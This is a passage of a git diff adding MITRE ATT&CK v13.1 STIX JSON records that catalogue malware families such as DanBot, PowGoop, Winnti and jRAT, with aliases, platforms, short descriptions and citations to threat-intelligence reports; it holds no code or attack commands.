"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b8d48deb-450c-44f6-a934-ac8765aa89cb.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b8d48deb-450c-44f6-a934-ac8765aa89cb.json new file mode 100644 index 0000000000000000000000000000000000000000..de861690820e206636b08e393587ac51588fd7db --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b8d48deb-450c-44f6-a934-ac8765aa89cb.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--ff939eb3-a942-4a5c-9272-edad951a017f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "DanBot" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--b8d48deb-450c-44f6-a934-ac8765aa89cb", + "created": "2022-06-03T14:35:23.246Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S1014", + "url": "https://attack.mitre.org/software/S1014" + }, + { + "source_name": "SecureWorks August 2019", + "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign", + "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019)", + "modified": "2022-09-01T14:11:46.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DanBot", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2.json new file mode 100644 index 0000000000000000000000000000000000000000..78175e72bb40df32e838b301cef5600b15536643 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f046f843-25aa-46b0-b270-eac93b1ca462", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T19:34:38.763Z", + "name": "Pillowmint", + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Pillowmint" + ], + "type": "malware", + "id": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "created": "2020-07-27T14:06:29.560Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0517", + "external_id": "S0517" + }, + { + "source_name": "Trustwave Pillowmint June 2020", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020.", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c19d19ae-dd58-4584-8469-966bbeaa80e3.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c19d19ae-dd58-4584-8469-966bbeaa80e3.json new file mode 100644 index 0000000000000000000000000000000000000000..6b0c0bb674abb9da0a611ce97b0049a05d35e7e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c19d19ae-dd58-4584-8469-966bbeaa80e3.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--b5dc7694-471e-447f-82ff-a56de351befd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-17T14:40:59.636Z", + "name": "PowGoop", + "description": "[PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Ozer Sarilar, @ozersarilar, STM" + ], + "x_mitre_aliases": [ + "PowGoop" + ], + "type": "malware", + "id": "malware--c19d19ae-dd58-4584-8469-966bbeaa80e3", + "created": "2022-09-29T15:44:58.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1046", + "external_id": "S1046" + }, + { + "source_name": "CYBERCOM Iranian Intel Cyber January 2022", + "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.", + "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" + }, + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c9ccc4df-1f56-49e7-ad57-b383e1451688.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c9ccc4df-1f56-49e7-ad57-b383e1451688.json new file mode 100644 index 0000000000000000000000000000000000000000..924f8d166a6a957908e994c64dc67e25d37d6b70 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c9ccc4df-1f56-49e7-ad57-b383e1451688.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--ffbf2dcf-0910-4e75-a662-97b1d0adb4b7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "LookBack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c9ccc4df-1f56-49e7-ad57-b383e1451688", + "type": "malware", + "created": "2021-03-01T14:07:36.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0582", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0582" + }, + { + "source_name": "LookBack", + "description": "(Citation: Proofpoint LookBack Malware Aug 2019)" + }, + { + "source_name": "Proofpoint LookBack Malware Aug 2019", + "url": "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", + "description": "Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021." + }, + { + "source_name": "Dragos TALONITE", + "url": "https://www.dragos.com/threat/talonite/", + "description": "Dragos. (null). TALONITE. Retrieved February 25, 2021." + }, + { + "source_name": "Dragos Threat Report 2020", + "url": "https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770", + "description": "Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021." + } + ], + "modified": "2021-04-26T13:29:32.449Z", + "name": "LookBack", + "description": "[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--cf8df906-179c-4a78-bd6e-6605e30f6624.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--cf8df906-179c-4a78-bd6e-6605e30f6624.json new file mode 100644 index 0000000000000000000000000000000000000000..a3a22a4447e51a0a4d315a3aaf48a61eb1a071fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--cf8df906-179c-4a78-bd6e-6605e30f6624.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--e869ea72-4279-4e96-bb58-a20771b3f6f6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "FELIXROOT", + "GreyEnergy mini" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--cf8df906-179c-4a78-bd6e-6605e30f6624", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0267", + "external_id": "S0267" + }, + { + "source_name": "FELIXROOT", + "description": "(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)" + }, + { + "source_name": "GreyEnergy mini", + "description": "(Citation: ESET GreyEnergy Oct 2018)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html", + "description": "Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.", + "source_name": "FireEye FELIXROOT July 2018" + }, + { + "description": "Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "source_name": "ESET GreyEnergy Oct 2018" + } + ], + "modified": "2020-03-30T16:23:47.799Z", + "name": "FELIXROOT", + "description": "[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)", + "x_mitre_version": "2.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--d3afa961-a80c-4043-9509-282cdf69ab21.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--d3afa961-a80c-4043-9509-282cdf69ab21.json new file mode 100644 index 0000000000000000000000000000000000000000..5cf0a5b5c1095d0cd48f1afde558cc6e4050722f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--d3afa961-a80c-4043-9509-282cdf69ab21.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--b229227f-8102-461a-b252-0842d26e1a61", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T22:02:53.982Z", + "name": "Winnti for Windows", + "description": "[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "3.0", + "x_mitre_aliases": [ + "Winnti for Windows" + ], + "type": "malware", + "id": "malware--d3afa961-a80c-4043-9509-282cdf69ab21", + "created": "2017-05-31T21:33:21.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0141", + "external_id": "S0141" + }, + { + "source_name": "Microsoft Winnti Jan 2017", + "description": "Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/" + }, + { + "source_name": "Chronicle Winnti for Linux May 2019", + "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.", + "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" + }, + { + "source_name": "401 TRG Winnti Umbrella May 2018", + "description": "Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.", + "url": "https://401trg.github.io/pages/burning-umbrella.html" + }, + { + "source_name": "Kaspersky Winnti April 2013", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.", + "url": "https://securelist.com/winnti-more-than-just-a-game/37029/" + }, + { + "source_name": "Novetta Winnti April 2015", + "description": "Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.", + "url": "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c.json new file mode 100644 index 0000000000000000000000000000000000000000..4dfc577b83379eb88a3ccea1758fa358d5329ae5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--76654795-d020-4146-b735-4d72459f8fa6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Christiaan Beek, @ChristiaanBeek", + "Ryan Becwar" + ], + "x_mitre_aliases": [ + "TURNEDUP" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0199", + "external_id": "S0199" + }, + { + "source_name": "TURNEDUP", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + } + ], + "modified": "2021-02-09T15:25:33.116Z", + "name": "TURNEDUP", + "description": "[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e066bf86-9cfb-407a-9d25-26fd5d91e360.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e066bf86-9cfb-407a-9d25-26fd5d91e360.json new file mode 100644 index 0000000000000000000000000000000000000000..270ba017f9f6ff80560167479e4e53a3b9ff9d96 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e066bf86-9cfb-407a-9d25-26fd5d91e360.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--09a5bdc2-0556-4d97-a1f4-6015168447e9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HTTPBrowser", + "Token Control", + "HttpDump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360", + "type": "malware", + "created": "2017-05-31T21:32:46.445Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0070", + "external_id": "S0070" + }, + { + "source_name": "HttpDump", + "description": "(Citation: ThreatConnect Anthem)" + }, + { + "url": "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.", + "source_name": "ThreatStream Evasion Analysis" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "url": "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "description": "ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.", + "source_name": "ThreatConnect Anthem" + } + ], + "modified": "2020-03-20T02:22:13.185Z", + "name": "HTTPBrowser", + "description": "[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e48df773-7c95-4a4c-ba70-ea3d15900148.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e48df773-7c95-4a4c-ba70-ea3d15900148.json new file mode 100644 index 0000000000000000000000000000000000000000..e93fcb9a4eda757a047f57c9ada52642a4d8bc8e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e48df773-7c95-4a4c-ba70-ea3d15900148.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--612ecac1-1241-4c44-919a-6741ed7f9a5f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "DownPaper" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0186", + "external_id": "S0186" + }, + { + "source_name": "DownPaper", + "description": "(Citation: ClearSky Charming Kitten Dec 2017)" + }, + { + "source_name": "ClearSky Charming Kitten Dec 2017", + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + } + ], + "modified": "2020-03-30T15:31:30.330Z", + "name": "DownPaper", + "description": "[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e9595678-d269-469e-ae6b-75e49259de63.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e9595678-d269-469e-ae6b-75e49259de63.json new file mode 100644 index 0000000000000000000000000000000000000000..e580d69df39cd9c86e0fda358b5081b7155f10f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e9595678-d269-469e-ae6b-75e49259de63.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--eba391a5-5356-4cc9-93e9-290b0febdef1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BADNEWS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e9595678-d269-469e-ae6b-75e49259de63", + "type": "malware", + "created": "2017-05-31T21:33:14.118Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0128", + "external_id": "S0128" + }, + { + "source_name": "BADNEWS", + "description": "(Citation: Forcepoint Monsoon)" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "modified": "2021-06-21T12:32:12.581Z", + "name": "BADNEWS", + "description": "[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c.json new file mode 100644 index 0000000000000000000000000000000000000000..023a0476bdead0bfd4d864da5b9fc08fd84aa20c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c.json @@ -0,0 +1,108 @@ +{ + "type": "bundle", + "id": "bundle--7dc6c674-7187-40bb-af3c-38a286204305", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "jRAT", + "JSocket", + "AlienSpy", + "Frutas", + "Sockrat", + "Unrecom", + "jFrutas", + "Adwind", + "jBiFrost", + "Trojan.Maljava" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0283", + "external_id": "S0283" + }, + { + "source_name": "jRAT", + "description": "(Citation: jRAT Symantec Aug 2018)" + }, + { + "source_name": "JSocket", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "AlienSpy", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Frutas", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Sockrat", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Unrecom", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "jFrutas", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Adwind", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "jBiFrost", + "description": "(Citation: NCSC Joint Report Public Tools)" + }, + { + "source_name": "Trojan.Maljava", + "description": "(Citation: jRAT Symantec Aug 2018)" + }, + { + "description": "Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf", + "source_name": "Kaspersky Adwind Feb 2016" + }, + { + "source_name": "jRAT Symantec Aug 2018", + "description": "Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques" + }, + { + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.", + "url": "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools", + "source_name": "NCSC Joint Report Public Tools" + } + ], + "modified": "2021-01-25T15:43:45.842Z", + "name": "jRAT", + "description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)", + "x_mitre_version": "2.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e.json new file mode 100644 index 0000000000000000000000000000000000000000..fbfed8ff07e71da53c02a17a0feb6d0e3e3d866a --- /dev/null +++ 